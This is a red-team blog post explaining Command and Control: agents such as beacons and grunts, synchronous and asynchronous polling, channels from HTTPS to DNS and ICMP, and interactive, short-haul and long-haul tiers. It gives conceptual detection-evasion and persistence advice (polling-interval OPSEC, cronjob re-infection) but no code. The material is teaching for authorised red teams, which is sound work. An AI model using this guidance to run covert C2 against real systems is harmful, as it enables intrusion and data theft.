It's all about Command and Control
Learn all about Command and Control (C2), its categories, channels, tiers and its role in red team operations.
A Command and Control (C2) tool is the crown jewel of a red team’s arsenal. It enables them to establish a centralized communication channel with compromised hosts (Command), with the help of a small piece of software, and then use this channel to assign tasks or perform some action on them, such as download and install additional tools (Control). This is similar to how military ops are often portrayed in movies. There is usually a war room where military personnel are located, monitoring and governing the op (Command), and there are soldiers on ground who are executing their orders (Control).
The small piece of software, that enables this communication and command execution on a compromised host, is commonly referred to as an agent. A C2 tool may also implement it’s own nomenclature for these agents. For example, Cobalt Strike calls them beacon whereas Covenant C2 calls them grunt. You may also referred to them as implants.
C2 can be categorized as:
Synchronous - The communication channel between the C2 and the agent is always kept open. It enables real-time communication between the C2 and and the agent. This is the least preferred way of communicating with agents as it does not provide adequate OPSEC.
Asynchronous - The communication channel between the C2 and the agent is established at periodic intervals. The agent polls the C2 (known as polling), at a defined interval (known as polling interval), to check if there are any tasks and report output from the previous task. The polling interval is controlled by the red team operator. It can be minimized to an extent that the communication between the C2 and the agent appears to be in real-time. Selecting the right polling interval is tricky, but necessary for OPSEC, as too much communication with C2 (i.e keeping the polling interval low) may lead to detection of the agent and too delayed communication with C2 (i.e keeping the polling interval high) can result in engagement delay.
On-Demand - The communication channel between the C2 and the agent is established as and when required. For example, the operator may want to open up a web shell or may want to establish a reverse shell connection from the compromised host.
Follow my journey of 100 Days of Red Team on WhatsApp or Discord.
A C2 is capable of communicating with the agent over multiple channels (or protocols), such as:
HTTP / HTTPS - The communication between the C2 and the agent happens via web requests. The C2 creates a web server as a listener, which issues tasks to the agent and accepts the output from them.
DNS - The communication between the C2 and the agent happens via DNS resolution requests. The red team operator creates a name server record which points to the IP address controlled by the C2. The C2 creates a listener on this IP address, to receive and resolve DNS requests sent by the agent. Watch this video for a technical deep dive.
TCP - The communication between the C2 and the agent happens over TCP instead of standard layer 7 protocols.
ICMP - The communication between the C2 and the agent happens via ICMP echo requests. The data is smuggled within the data section of an ICMP datagram. The volume of data that can be smuggled within ICMP echo requests is too low, to make this channel practical for most purposes. Also, ICMP protocol does not encrypt the data section of the datagram.
SSH - The communication between the C2 and the agent happens over a SSH connection. This connection is usually established using the tools available on the compromised host.
SMB - The communication between the C2 and the agent happens via named pipes using SMB. This channel is commonly used for establishing connection with internal hosts (daisy chaining) within the target environment.
Others - Various C2 tools may offer support for additional channels such as via messaging apps, social media, emails etc. Certain C2 tools also offer the capability to integrate with other C2 tools. Check this list from MITRE to know about all channels that can be used for C2 communication.
During a red team engagement, C2 channels can be established as per following tiers:
Interactive - C2 channels in this tier are used more frequently than others. They are primarily used for issuing commands, enumeration, scanning and data exfiltration. The callback time is usually within minutes. For example, C2 agents deployed on target machines.
Short-Haul - C2 channels in this tier are used to re-establish interactive mechanisms. The callback time is within 12-24 hours. For example, a cronjob that downloads the C2 agent and executes it every 12 hours.
Long-Haul - C2 channels in this tier are used to re-establish short-haul mechanisms. The callback time is 24 hours or more. This is the slowest mechanism of all three and should not be used for interactive purposes. For example, a start-up script to create the cronjob mentioned before.
Red Team Notes
- A Command and Control (C2) tool is a key red team asset, enabling centralized communication (Control) with compromised hosts via an agent, which executes assigned tasks (Command). Different C2 tools may use unique names for agents, like "beacon" in Cobalt Strike or "grunt" in Covenant C2.
- C2 Categories - Synchronous, Asynchronous and On-demand.
- C2 Channels - HTTP/HTTPS, DNS, TCP, ICMP, SSH, SMB and others.
- C2 Tiers - Interactive, Short-Haul and Long-Haul.
- OPSEC considerations must be taken into account to establish reliable C2 channels and avoid detection.
- While it is usually difficult to reach target hosts directly from the internet but hosts can establish an out-bound connection. Keep this mind when selecting the channel.
Follow my journey of 100 Days of Red Team on WhatsApp or Discord.
C2 is a key capability that a red team must have. It enables red team operators to keep track of compromised hosts in a centralized manner, interact with them and leverage them for further enumeration, command / tool execution, lateral movement, establishing persistence and data exfiltration. A good C2 tool provides enough flexibility to operators to customize itself as per their requirement, extend it with custom plugins and also enables collaboration between red team operators via session sharing.
Command and Control (C2) is covered in detail in the book, Red Team Development and Operations by Joe Vest and James Tubberville.
Also, check out the C2 Matrix project to learn about various C2 tools available in the market. It includes information about both, commercial and open-source C2 tools. The list is updated regularly as and when new C2 tools are published.